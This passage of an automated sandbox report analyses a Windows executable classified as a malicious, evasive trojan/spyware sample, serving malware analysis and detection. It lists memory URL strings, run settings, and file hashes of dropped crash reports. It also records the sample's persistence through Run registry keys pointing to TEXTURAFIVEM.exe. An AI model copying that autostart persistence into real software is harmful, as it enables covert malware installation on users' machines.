            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000002.610418959.000000000095C000.00000004.00000020.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.comexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                        		high
                        http://www.tiro.comexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.goodfont.co.krexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comlexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fonts.comexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sakkal.comexplorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown

                                  Contacted IPs

                                  No contacted IP infos

                                  General Information

                                  Joe Sandbox Version:31.0.0 Emerald
                                  Analysis ID:388215
                                  Start date:15.04.2021
                                  Start time:23:53:07
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 15m 0s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:dqH3t8JU1x.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:38
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@21/24@4/0
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 41.7% (good quality ratio 38.7%)
                                  • Quality average: 71.6%
                                  • Quality standard deviation: 32.1%
                                  HCA Information:
                                  • Successful, ratio: 83%
                                  • Number of executed functions: 200
                                  • Number of non-executed functions: 223
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.88.21.125, 92.122.145.220, 2.23.155.232, 2.23.155.186, 104.43.139.144, 13.64.90.137, 40.88.32.150, 52.255.188.83, 20.82.210.154, 23.32.238.177, 23.32.238.234, 8.238.85.254, 8.241.80.126, 8.253.145.105, 8.241.126.121, 8.241.78.126, 51.103.5.186, 52.155.217.156, 20.54.26.129, 184.30.20.56, 104.42.151.234, 168.61.161.212
                                  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, download.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  23:54:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU C:\Windows\install\TEXTURAFIVEM.exe
                                  23:54:18AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKLM C:\Windows\install\TEXTURAFIVEM.exe
                                  23:54:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HKCU C:\Windows\install\TEXTURAFIVEM.exe
                                  23:55:30API Interceptor529x Sleep call for process: explorer.exe modified
                                  23:55:51API Interceptor3x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_TEXTURAFIVEM.exe_7093d9524e5bd5c0215ba39f85fdf23d4de02c1c_8246e0ef_1a16d5fc\Report.wer
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):10874
                                  Entropy (8bit):3.7750363652092847
                                  Encrypted:false
                                  SSDEEP:96:364FKy3rTFq0hhq+7MfGpXIQcQvc6QcEDMcw3DSV7VC+HbHg15AJkq+8ls55nj+U:q9oTXHBUZMXojXgkN/u7sMS274Itz7
                                  MD5:93A6830A63CCDC723774058FC563775F
                                  SHA1:1637A96E8060791670FF9AFADCA0DECC3F553124
                                  SHA-256:C9948267D54BC2C2296C61AB7690F5D927AED3F57A3DCCD1BF04F5EDFC1B65D4
                                  SHA-512:CEE9BDBE15DFE992ADBBA5E5D44FAAF52D72794AD3F6F673AA308FD9450D07B8B9C9E58C66A2D55E24423810A0CD73606BCAB7A4160E447A0A27BC4833849323
                                  Malicious:false
                                  Reputation:low
                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.0.2.9.7.3.7.2.7.7.9.1.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.3.0.2.9.7.4.8.9.3.4.3.6.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.7.b.a.3.6.5.-.6.6.4.e.-.4.c.f.d.-.9.0.5.7.-.2.1.f.0.c.e.c.e.8.8.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.a.5.e.f.c.6.-.4.7.1.3.-.4.7.3.a.-.8.2.8.4.-.d.8.6.6.1.3.3.f.b.1.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.E.X.T.U.R.A.F.I.V.E.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.3.8.-.0.0.0.1.-.0.0.1.7.-.d.9.1.b.-.5.f.7.d.8.d.3.2.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.0.0.4.1.e.d.9.3.1.4.9.c.0.f.e.1.b.d.b.c.9.0.1.3.4.c.0.f.6.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.2.7.3.7.6.0.e.a.9.b.8.c.f.2.b.4.e.6.0.e.4.8.e.d.7.e.a.9.6.a.b.9.2.b.b.3.f.a.1.d.!.T.E.X.T.U.R.A.F.I.V.E.M...e.x.e.....T.a.
                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_explorer.exe_2e7e35a328c547159bb9cf721d9ab73be4b27e1_3e00274c_16a3140e\Report.wer
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):13758
                                  Entropy (8bit):3.757972856854361
                                  Encrypted:false
                                  SSDEEP:192:yMbCSrMEH9fA1jSLOqRPZKQ/u7sMS274ItH0e:l14M9fA1jx+/u7sMX4ItHb
                                  MD5:C7ACB8D75CC3F2AAE4E5A62BD65CD6A2
                                  SHA1:48AD6602D8FD2EF68EA89095E3D0DD2B5C15A807
                                  SHA-256:048999CD1B3CC12ADC45ECD948799D96792195976277D11CF2752BC39CE72276
                                  SHA-512:805F2ACECC1AC0F2B11D5413C6F275874D7FCCE7CF9CFD9E2C9EDBCF11C8A1A1DC32352BC256F4C8937F5D3D5EE714A174256C96D638A43B979F7DE812EFB60F
                                  Malicious:false
                                  Reputation:low
                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.0.2.9.7.4.8.5.0.1.9.0.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.3.0.2.9.7.6.5.7.6.4.2.8.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.c.8.9.2.1.4.-.f.7.b.b.-.4.1.d.8.-.a.e.c.f.-.3.d.5.3.c.7.f.7.b.f.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.4.4.4.c.6.2.-.c.b.a.f.-.4.3.5.b.-.9.e.d.5.-.1.0.2.e.e.7.8.7.2.8.3.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.e.8.-.0.0.0.1.-.0.0.1.7.-.c.e.e.3.-.d.2.7.b.8.d.3.2.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.1.2.9.9.c.c.f.b.2.8.8.4.d.5.d.6.d.7.0.9.0.6.b.4.6.1.4.3.5.a.0.d.0.
                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_explorer.exe_2e7e35a328c547159bb9cf721d9ab73be4b27e1_3e00274c_1a9afffa\Report.wer
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):13756
                                  Entropy (8bit):3.7594092204114555
                                  Encrypted:false
                                  SSDEEP:192:pa5gaCSrMwH9fA1jJi7dRPZKQ/u7sMS274ItH0f:pogs4Y9fA1ju5/u7sMX4ItHi
                                  MD5:97769FFB0B86A8B516CDF364DC9B0944
                                  SHA1:27C24B0602304B59F8C7BE6ED7F95D5EF335D954
                                  SHA-256:41CDEBC44AA12037BD65A9445212330F51A2E7D148413BE0AD4288C7C1BE0309
                                  SHA-512:63A632E0690780BF69F98741D3024234CBC4C7ACB03779716F4B32AAD02CA024A537DCDDF119FC6CD2493EF948EA5107226BE8198E76E1387D8F24B17A429561
                                  Malicious:false
                                  Reputation:low
                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.0.2.9.7.4.2.3.2.4.7.7.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.3.0.2.9.7.6.0.5.1.4.3.0.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.2.9.8.8.6.a.-.a.9.f.3.-.4.5.0.e.-.a.b.a.4.-.3.b.2.2.8.7.4.8.f.c.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.3.c.1.d.c.5.-.2.b.1.9.-.4.3.e.e.-.9.6.a.f.-.a.a.5.a.7.9.d.7.5.7.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.1.4.-.0.0.0.1.-.0.0.1.7.-.f.f.7.5.-.6.3.7.5.8.d.3.2.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.1.2.9.9.c.c.f.b.2.8.8.4.d.5.d.6.d.7.0.9.0.6.b.4.6.1.4.3.5.a.0.d.0.
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B9.tmp.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4670
                                  Entropy (8bit):4.499298054206131
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zshJgtWI9uOhWSC8Bj8fm8M4JmIL1ZFPE+q8jLYULZzkd:uITfzZ5SN2Jv1TECpLZzkd
                                  MD5:8D8A054339FE946E1E63CD28D85AA699
                                  SHA1:5E560C39FE31D6EE067F9B3EDA1090222B2F396F
                                  SHA-256:1E6395400D78BD35F564046922303EA6C0B07BC4F368A24D499B40C485C67E8B
                                  SHA-512:FA27F171768B0764883F5F2B0BC7EFCA36869EA00353A045722543277555B776AA7E3091360D6D068E33AC9B95EF9D6617AB7740B503CF29C861943868A6469D
                                  Malicious:false
                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="948486" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CFA.tmp.dmp
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Apr 16 06:55:40 2021, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):50640
                                  Entropy (8bit):1.9489459799241413
                                  Encrypted:false
                                  SSDEEP:192:P97621hat82TLj2Hws9oLyZC1yaZu4+DwUwJVG6XyA2r7:Bj1h4L6HpC1sVDwlvyV7
                                  MD5:E12AA0B7403D7F57E43497AFFA6B41CE
                                  SHA1:A4A727AB61BEE1846947B3C4514B88A2ABC69E00
                                  SHA-256:AF28A30E924E58F2921EAD500CD9AEDCBAE99DDDA23114D3E354D67ED1DEBF2E
                                  SHA-512:BE245E6A15328EBFE1D699D27C66D33F2DE826AD1087587B28ACCB82537791AC4A592FB8382A07EDC001650C1CA0458BD5E8E6C0EA48613FF5C715D93CD17EC8
                                  Malicious:false
                                  Preview: MDMP....... ........4y`...................U...........B..............GenuineIntelW...........T.......8....4y`.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8F2.tmp.WERInternalMetadata.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8286
                                  Entropy (8bit):3.698875053349122
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNizi6M6Yap6/FoqgmfdSzCprC89by4sfBGm:RrlsNi26M6Yc6/FoqgmfdSwyrfJ
                                  MD5:313EC80C367AAE142942DB59BF47F931
                                  SHA1:6F65923B644BB810C91580A3DECF3D4A9CA32CBF
                                  SHA-256:015E59545925394A9A55287696D5CA360E5BB45BAF6A7787432FF5CAA6171D71
                                  SHA-512:773E52BDF4B646921B3B96F85E365AD7DA0AF39EB3467135A56E79718C296DFE01FA63E275B01D3126F9141686C4156F5FF4ACABBF679BAC6A89DD1F7E89C873
                                  Malicious:false
                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.3.2.<./.P.i.d.>.......
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC0F.tmp.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4576
                                  Entropy (8bit):4.503458124043041
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zshJgtWI9uOhWSC8B68fm8M4JNRWC9FXM+q82nryBWrfTdTud:uITfzZ5SNFJNRLvMdnmB+fTdTud
                                  MD5:7E0906B6455FF93AA8FE7071284EED90
                                  SHA1:EF26EF6033C825EB9E7872356368B2DB682EFDA0
                                  SHA-256:D40222DCED6EF7269161C197985A23E7FE603DC85DA1C792DCA628603FCD2E95
                                  SHA-512:810461B51028E23ECEC62A9B2F067383E77DE5F8C3F2068CBEAFD8858501302C369F2A0D95F94FC6E0F260138E29B13B994F917BCE26231EB83E6202F362099D
                                  Malicious:false
                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="948486" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0B1.tmp.dmp
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Apr 16 06:55:46 2021, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):183936
                                  Entropy (8bit):1.4381852222832645
                                  Encrypted:false
                                  SSDEEP:384:5VrkJu8iX/V6MCT7NFejq3ioJiMrQwlqwpaU:5cTivV6JvTejqSoMGBMU
                                  MD5:ED5B058B983884379AC400C79B5EC396
                                  SHA1:93BC2BDB07928AE43AAE27554BE59D9631A632DF
                                  SHA-256:2ECA9D28DF00E0F1DA52B2456F68395514DCF3AA2177BC47D57DBABA50EBDEA8
                                  SHA-512:3D18E1D329E4BC04D7E343A04433D5C408F71E41D7E3F08D05E423E48626981FFCED9E260333C4D6C280FA3EAB716F2156F3BF150E9DD2FD2AFAAA198831B2F1
                                  Malicious:false
                                  Preview: MDMP....... ........4y`...................U...........B......d'......GenuineIntelW...........T............4y`.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC42A.tmp.WERInternalMetadata.xml
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8294
                                  Entropy (8bit):3.695055426456443
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNip4s6Fii6YiQ56TTgmfqDSRCprX89btQsfovm:RrlsNipb6F6Yn56TTgmfqDSBtjft
                                  MD5:C247481A4419EEF0E719D28607963E95
                                  SHA1:E597609B119403F1399FFE933C483C8F1C3922A4
                                  SHA-256:5C900913985309C8833E03188332946A5E96DB0036469E8AA7574551C65A6F4A
                                  SHA-512:DC20B2B34AD4D8BEE267B76C053A28300B8175687885DBB99BF9B96310A37EDDD48CAB629C446AE76874C29C49685789419B42279486DE60775813D62F250FAC
                                  Malicious:false
